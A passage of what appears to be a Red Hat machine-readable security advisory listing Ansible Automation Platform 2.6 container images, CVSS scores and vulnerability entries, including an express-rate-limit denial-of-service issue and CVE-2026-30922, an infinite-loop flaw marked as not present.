"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express-rate-limit: express-rate-limit: Denial of Service for IPv4 clients due to incorrect IPv6 subnet masking"
},
{
"cve": "CVE-2026-30922",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-18T04:02:45.401296+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
